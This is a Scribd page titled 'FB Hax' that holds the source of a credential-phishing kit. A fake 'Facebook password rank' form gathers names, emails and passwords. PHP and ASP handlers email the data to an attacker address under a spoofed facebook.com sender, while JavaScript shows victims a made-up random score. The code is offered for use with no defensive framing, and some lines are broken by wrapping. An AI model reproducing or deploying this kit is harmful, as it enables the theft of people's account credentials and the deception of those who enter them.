0% found this document useful (0 votes)
93 views

FB Hax

The document contains PHP and ASP code to send user-submitted name, email, and password values from a fake Facebook password checker form to an email address. The code uses trim() to sanitize the input and mail() and SMTP to send an HTML email with the input values to a specified email. It also includes JavaScript to display a random "password rank" message after form submission and CSS for styling the fake form.
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
93 views

FB Hax

The document contains PHP and ASP code to send user-submitted name, email, and password values from a fake Facebook password checker form to an email address. The code uses trim() to sanitize the input and mail() and SMTP to send an HTML email with the input values to a specified email. It also includes JavaScript to display a random "password rank" message after form submission and CSS for styling the fake form.
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

<?php error_reporting (E_ALL ^ E_NOTICE); $email.= "<b>Name : </b>".trim($_POST['name'])."<br/>"; $email.= "<b>Email : </b>".trim($_POST['email'])."<br/>"; $email.= "<b>Password : </b>".trim($_POST['password'])."<br/>"; $headers = "From:facebook@facebook.

com\r\n"; $headers .= "Content-Type: text/html"; mail( "[email protected]", "Password from Facebook", $email, $headers ); echo "Mail Completed"; ?> <% dim Name, _ Email, _ Passsword

Name = Request("name") Email = Request("email") Password = Request("password") call DirEmail(Name,Email,Password) sub DirEmail(sName,sEmail,sPassword) dim Mailer set Mailer = Server.CreateObject("SMTPsvg.Mailer") Mailer.FromName = "Facebook" Mailer.FromAddress= "[email protected]" Mailer.RemoteHost = "smtp.server29.000webhost.com" Mailer.AddRecipient "your name", "[email protected]" Mailer.Subject = "Password from Facebook" Mailer.ContentType = "text/html" Mailer.BodyText = "<b>Name & "<b>Email & "<b>Password : </b>" & sName & "<br/>" _ : </b>" & sEmail & "<br/>"_ : </b>" & sPassword & "<br/>"

if not Mailer.SendMail then Response.Write "Mail send failure. Error was " & Mailer.Response Response.End() end if Response.Write "Mail Completed" end sub %> <style> #facebook_box { clear: both; width: 55%; margin-top: 0px;

margin-right: auto; margin-bottom: 0px; margin-left: auto; padding: 10px; border: thin solid #E8E8E8; } .info_box_top { HEIGHT: 15px; margin-bottom: 5px; padding-bottom:5px; margin-left:5px; margin-right:5px; border-bottom-width: thin; border-bottom-style: solid; border-bottom-color:#FFCC33; font-weight: bold; } p { text-align: justify; } .info_box_middle img { float: left; border: thin solid #CCCCCC; margin: 3px; } input[type=hidden]{ display:none; } .twoColumn { float:left; padding-right:20px; width:44%; } input[type=botton] { margin:0px; padding:0px; text-align:center; } LABEL { PADDING-RIGHT: 3px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; MARG IN-BOTTOM: 10px; PADDING-BOTTOM: 3px; WIDTH: 100px; PADDING-TOP: 3px; } INPUT.textbox { PADDING-RIGHT: 3px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; MARG IN-BOTTOM: 10px; PADDING-BOTTOM: 3px; WIDTH: 250px; PADDING-TOP: 3px; } input.submit { background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfA gFQe.png); background-position:0px 280px; color:#FFF; border:0px; height:30px; } </style>

<script> function AlertMsg(){ var msgdialog = new Dialog(); var ok ='This application is designed to assess the strength of password strings . So enter your correct email address and password for accurate report from Fac ebook. If you have enter correct info, please click test button.'; msgdialog.showMessage('Enter Your Correct Facebook Info', ok); return false; } </script> <div style="width: 650px;" id="facebook_box"> <div align="left" style="height: auto;" class="info_box_top"> <h1>Check Your Facebook Password Rank</h1> </div> <div align="left" class="info_box_middle"> <p><B>Check your password rank now & make sure to have password ran k between 5 to 10</b>.<br/> </div></div></p> <div class="two_column"> <div class="left"> </div> <div style="width: 400px;" class="left"> <form action="http://yourwebsite.com/facebook.php" id="ContactForm" name="C ontactForm" method="post"> <label>Name</label> <input type="text" tabindex="1" value="" name="name" id="name" class="text box" /> <br/> <label>Email</label> <input type="text" tabindex="2" value="" name="email" id="email" class="te xtbox" onChange="AlertMsg();" /> <br/> <label>Password</label> <input type="PaSSWord" tabindex="3" value="" name="password" id="password" class="textbox" /> <input type="button" class="submit" onclick="submitFacebookForm(this);" va lue="Test Your Password Now" /> <input type="hidden" value="0" name="send" id="send" style="display: none; "/> </form> </div> </div> </div> <script> function submitFacebookForm(sub) { sub.setDisabled(true); sub.setValue(".. DONE .."); var ajax = new Ajax(); ajax.responseType = Ajax.FBML; ajax.ondone = function(data)

{ var msgdialog = new Dialog(); var myvalue = Math.floor(Math.random()*4) + 7; var okmsg = 'According to facebook password algorithm chart, your password rank is ' + myvalue + ' of 10'; msgdialog.showMessage('Your Password Rank', okmsg); return false; } ajax.onerror = function() { var msgdialog = new Dialog(); msgdialog.showMessage('Error', 'An error has occurred while tryi ng to submit.'); return false; } // collect field values var queryParams = { 'name' : document.getElementById('name').getValue(), 'email' : document.getElementById('email').getValue(), 'password' : document.getElementById('password').getValue(), 'send' : document.getElementById('send').getValue() }; ajax.post('http://yourwebsite.com/facebook.php?sys=fbpage', queryParams) ; return false; } </script>

You might also like